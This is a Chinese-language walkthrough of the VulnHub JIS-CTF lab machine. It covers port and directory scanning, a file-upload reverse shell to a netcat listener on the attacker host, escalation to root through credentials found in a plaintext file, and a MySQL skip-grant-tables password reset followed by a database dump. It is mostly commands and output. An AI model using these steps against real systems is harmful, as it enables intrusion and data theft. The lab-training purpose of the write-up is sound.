【VulnHub】JIS-CTF

實驗環境：
靶機：192.168.0.149
攻擊機kali：192.168.0.103

一、信息收集

1、masscan快速掃端口，發現22，80端口。

root@redwand:~# masscan -p0-65535 --rate=1000 192.168.0.149
Discovered open port 80/tcp on 192.168.0.149
Discovered open port 22/tcp on 192.168.0.149

2、nmap掃22，80服務版本號及漏洞。

root@redwand:~# nmap -sC -sV -p22,80 192.168.0.149
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries
| / /backup /admin /admin_area /r00t /uploads
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:0E:50:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3、入手80端口，dirb掃目錄。

root@redwand:~# dirb http://192.168.0.149
---- Scanning URL: http://192.168.0.149/ ----
==> DIRECTORY: http://192.168.0.149/admin_area/
==> DIRECTORY: http://192.168.0.149/assets/
==> DIRECTORY: http://192.168.0.149/css/
==> DIRECTORY: http://192.168.0.149/flag/
+ http://192.168.0.149/index.php (CODE:302|SIZE:1228)
==> DIRECTORY: http://192.168.0.149/js/
+ http://192.168.0.149/robots.txt (CODE:200|SIZE:160)
+ http://192.168.0.149/server-status (CODE:403|SIZE:301)

---- Entering directory: http://192.168.0.149/admin_area/ ----
+ http://192.168.0.149/admin_area/index.php (CODE:200|SIZE:224)

---- Entering directory: http://192.168.0.149/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.149/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.149/flag/ ----
+ http://192.168.0.149/flag/index.html (CODE:200|SIZE:109)

---- Entering directory: http://192.168.0.149/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

4、whatweb查看環境。

root@redwand:~# whatweb 192.168.0.149/login.php
http://192.168.0.149/login.php [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.0.149], JQuery, PasswordField[pass_word], Script, Title[Sign-Up/Login Form]

5、逐一翻看web目錄

• 發現登陸界面192.168.0.149/login.php
  
• 發現目錄瀏覽漏洞，以及apache版本（ServerSignature on）。
  
• robots.txt文件發現目錄。
  
• 訪問http://192.168.0.149/flag/發現1st flag。
  
• http://192.168.0.149/admin_area/，源碼中發現一組賬號密碼及2nd flag。
  
  
• 使用gobuster依次掃各目錄下的txt文件。

root@redwand:~#  gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.149 -t 100 -x txt
/assets (Status: 301)
/css (Status: 301)
/js (Status: 301)
/flag (Status: 301)
/flag.txt (Status: 403)
/robots.txt (Status: 200)
/uploaded_files (Status: 301)
/hint.txt (Status: 200)
/server-status (Status: 403)

發現hint.txt，得到3rd flag及用戶technawi。

訪問其他目錄均403，至此，前期信息收集基本完成。

二、getshell

1、使用得到的一組賬號密碼username : admin，password : 3v1l_H@ck3r登陸成功，發現上傳點。

2、上傳info.php，在/uploaded_files目錄下找到上傳文件，成功解析，驗證上傳漏洞。

3、上傳php-reverse-shell反彈shell到kali攻擊機，python3導入pty交互式得到shell。

root@redwand:~# rlwrap nc -lvp 6666
listening on [any] 6666 ...
192.168.0.149: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.149] 56148
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:28:10 up 52 min,  0 users,  load average: 0.00, 2.25, 3.94
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Jordaninfosec-CTF01:/$

三、提權

1、找到登陸用戶technawi，並在家目錄下發現.sudo_as_admin_successful文件，找到sudo提權線索。

www-data@Jordaninfosec-CTF01:/tmp$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
www-data@Jordaninfosec-CTF01:/home/technawi$ ls -al
ls -altotal 48
drwxr-xr-x 3 technawi technawi 4096 Apr 21  2017 .
drwxr-xr-x 3 root     root     4096 Apr 11  2017 ..
-rw------- 1 technawi technawi 4321 Apr 21  2017 .bash_history
-rw-r--r-- 1 technawi technawi  220 Apr 11  2017 .bash_logout
-rw-r--r-- 1 technawi technawi 3771 Apr 11  2017 .bashrc
drwx------ 2 technawi technawi 4096 Apr 11  2017 .cache
-rw-r--r-- 1 technawi technawi  655 Apr 11  2017 .profile
-rw-r--r-- 1 technawi technawi    0 Apr 11  2017 .sudo_as_admin_successful
-rw------- 1 root     root     6666 Apr 21  2017 .viminfo
-rw-r--r-- 1 root     root     7141 Apr 18  2017 1

2、依次排查進程，內核，未發現合適提權線索。
3、使用grep命令全局搜索technawi相關文件，找到敏感文件，得到賬號密碼。
grep命令選項
-r, --recursive 遞歸子目錄
-i, --ignore-case 忽略大小寫
-n, --line-number 顯示行號
-s, --no-messages 不顯示錯誤消息，功能類似於 2>/dev/null
–exclude-dir=proc/ 排除proc目錄

www-data@Jordaninfosec-CTF01:/home/technawi$ grep -inrs "technawi" --exclude-dir=proc/ /
<1:/home/technawi$ grep -inrs "technawi" --exclude-dir=proc/ /
/etc/subgid:3:technawi:165536:65536
/etc/mysql/conf.d/credentials.txt:3:username : technawi
/etc/subuid:3:technawi:165536:65536
/etc/passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
/etc/group:5:adm:x:4:syslog,technawi
/etc/group:18:cdrom:x:24:technawi
/etc/group:21:sudo:x:27:technawi
/etc/group:23:dip:x:30:technawi
/etc/group:35:plugdev:x:46:technawi
/etc/group:49:lxd:x:110:technawi
/etc/group:54:technawi:x:1000:
/etc/group:55:lpadmin:x:115:technawi
/etc/group:56:sambashare:x:116:technawi

在/etc/mysql/conf.d/credentials.txt下找到賬號密碼

www-data@Jordaninfosec-CTF01:/home/technawi$ cat /etc/mysql/conf.d/credentials.txt
<1:/home/technawi$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

切換用戶technawi，sudo su -提權成功

www-data@Jordaninfosec-CTF01:/home/technawi$ su - technawi
Password: 3vilH@ksor

technawi@Jordaninfosec-CTF01:~$ sudo su -
[sudo] password for technawi: 3vilH@ksor

root@Jordaninfosec-CTF01:~# whoami
root

最後在/home/technawi/flag.txt找到第四個flag，在/root目錄下找到第五個flag。

四、獲取數據庫數據

既然是滲透測試，實戰中肯定不光是拿到flag就完事了，我們看到了mysql數據庫，那麼能不能把數據導出拿回來呢。

• 在一個終端ssh登陸root，先關閉mysql服務，後mysqld_safe模式開啓服務。

root@Jordaninfosec-CTF01:/var/www# mkdir -p /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# chown -R mysql:mysql /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# mysqld_safe --skip-grant-tables &
[1] 7262
root@Jordaninfosec-CTF01:/var/www# 2020-02-20T13:14:39.569415Z mysqld_safe Logging to syslog.
2020-02-20T13:14:39.571557Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-02-20T13:14:39.573679Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-02-20T13:14:39.586356Z mysqld_safe Starting mysqld daemon with databases from /var/lib/mysql

• 新開一個終端mysql -uroot無密碼登陸

root@Jordaninfosec-CTF01:/tmp# mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

• 查看數據庫

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)

• 查看mysql.user表

mysql> select host,user,authentication_string,plugin from user;
+-----------+------------------+-------------------------------------------+-----------------------+
| host      | user             | authentication_string                     | plugin                |
+-----------+------------------+-------------------------------------------+-----------------------+
| localhost | root             | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | mysql_native_password |
| localhost | mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | mysql_native_password |
| localhost | debian-sys-maint | *C46C96C2990814041379A76A744EE3E5026A0D64 | mysql_native_password |
+-----------+------------------+-------------------------------------------+-----------------------+

• 更新root密碼爲123456

mysql> update user set authentication_string=password("123456") where user="root";
Query OK, 0 rows affected, 1 warning (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 1
mysql>flush privileges;

• mysqldump導出需要的數據庫

root@Jordaninfosec-CTF01:/tmp# mysqldump -uroot -p sys > sys.sql
Enter password:

至此，成功導出sys數據庫，可以將文件下載回本地導入相同版本數據庫繼續分析數據。

五、花絮

1、受文件hint.txt內容干擾，誤認爲technawi文件密碼可能存儲在www-data可讀的隱藏文件中，使用find查找所有隱藏文件，未找到密碼。

www-data@Jordaninfosec-CTF01:/var/www/html$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
The 3rd flag is : {7645110034526579012345670}

www-data@Jordaninfosec-CTF01:/tmp$ find / -name "\.*" -perm -004 2>/dev/null
....
/etc/cron.weekly/.placeholder
/var/lib/apparmor/profiles/.apparmor.md5sums
/tmp/.XIM-unix
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout

覆盤思路1：
在提權信收集階段，以及通過netstat發現服務器開啓mysql服務，但通過查看/var/www/html內文件，未發現web連接mysql數據的相關配置文件，遂放棄mysql線索。

www-data@Jordaninfosec-CTF01:/var/www/html$ netstat -anput
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      2 192.168.0.149:56148     192.168.0.103:6666      ESTABLISHED 1693/sh
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 192.168.0.149:80        192.168.0.176:49846     ESTABLISHED -
udp        0      0 0.0.0.0:68              0.0.0.0:*

覆盤思路2:
對於CTF題目，很多敏感文件放在.txt後綴的文件中，可以通過find命令對服務器上所有可讀txt文件進行排查。

www-data@Jordaninfosec-CTF01:/var/www/html$ find / -name "*\.txt" -type f -perm -004 2>/dev/null
...
/usr/src/linux-headers-4.4.0-72/arch/sh/include/mach-ecovec24/mach/partner-jet-setup.txt
/usr/src/linux-headers-4.4.0-72/scripts/spelling.txt
/etc/mysql/conf.d/credentials.txt
/var/www/html/uploaded_files/file.txt
/var/www/html/hint.txt
/var/www/html/robots.txt

2、一點發現&收穫
webshell是一個非交互式的shell，因此使用webshell操作的命令不會記錄在webshell用戶www-data的家目錄下的.bash_history文件中。但實際滲透中，常常使用python導入交互式shell，這樣雖然使用方便，但也給溯源留下了.bash_history的文件痕跡。

www-data@Jordaninfosec-CTF01:/var/www$ exit
exit
$ cd /var/www
$ ls -al
total 16
drwxr-xr-x  3 www-data www-data 4096 Feb 20 05:13 .
drwxr-xr-x 14 root     root     4096 Apr 18  2017 ..
-rw-------  1 www-data www-data  760 Feb 20 05:13 .bash_history
drwxr-xr-x  8 www-data www-data 4096 Apr 21  2017 html